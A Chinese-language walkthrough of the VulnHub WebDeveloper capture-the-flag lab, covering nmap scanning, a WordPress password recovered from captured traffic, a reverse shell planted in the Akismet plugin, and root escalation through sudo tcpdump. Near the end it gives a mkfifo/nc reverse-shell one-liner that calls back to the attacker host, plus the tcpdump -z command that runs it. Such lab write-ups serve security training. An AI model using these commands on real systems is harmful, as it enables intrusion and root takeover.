前言
⏰时间:2023.7.29
🗺️靶机地址: https://download.vulnhub.com/webdeveloper/WebDeveloper.ova
⚠️文中涉及操作均在靶机模拟环境中完成,切勿未经授权用于真实环境。
🙏本人水平有限,如有错误望指正,感谢您的查阅!
🎉欢迎关注🔍点赞👍收藏⭐️留言📝
信息收集
发现主机
探测端口服务
┌──(root㉿kali)-[~]
└─# nmap -A -T4 -v -p- 192.168.58.163
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 d2:ac:73:4c:17:ec:6a:82:79:87:5a:f9:22:d4:12:cb (RSA)
| 256 9c:d5:f3:2c:e2:d0:06:cc:8c:15:5a:5a:81:5b:03:3d (ECDSA)
|_ 256 ab:67:56:69:27:ea:3e:3b:33:73:32:f8:ff:2e:1f:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Database Error
|_http-server-header: Apache/2.4.29 (Ubuntu)
MAC Address: 00:0C:29:6E:B6:EE (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 47.917 days (since Sun Jun 11 18:11:51 2023)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
扫目录
访问一下
流量分析
wireshark分析流量包
在wp-login.php登录页面请求找到账号密码
Form item: “pwd” = “Te5eQg&4sBS!Yr$)wf%(DcAd”
反弹shell
登录后找到编辑模板处插入反弹shell
扫目录时扫出wp-content/plugin/
刚才编辑的文件是plugin下面的akismet/akismet.php
访问http://192.168.58.163/wp-content/plugins/akismet/akismet.php试试
高可用SHELL
开启稳定shell
进入Webdeveloper
…/到网站根目录查看wp-config.php
进入webdeveloper用户
提权
可以利用tcpdump提权
经过测试,bash反弹不成功,目标机的nc不支持-e参数
但是mkfifo可以
nc -nvlp 6666
echo 'rm f /tmp/f;mkfifo /tmp/f;bash < /tmp/f|nc 192.168.58.153 6666 >/tmp/f' > haha
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/haha -Z root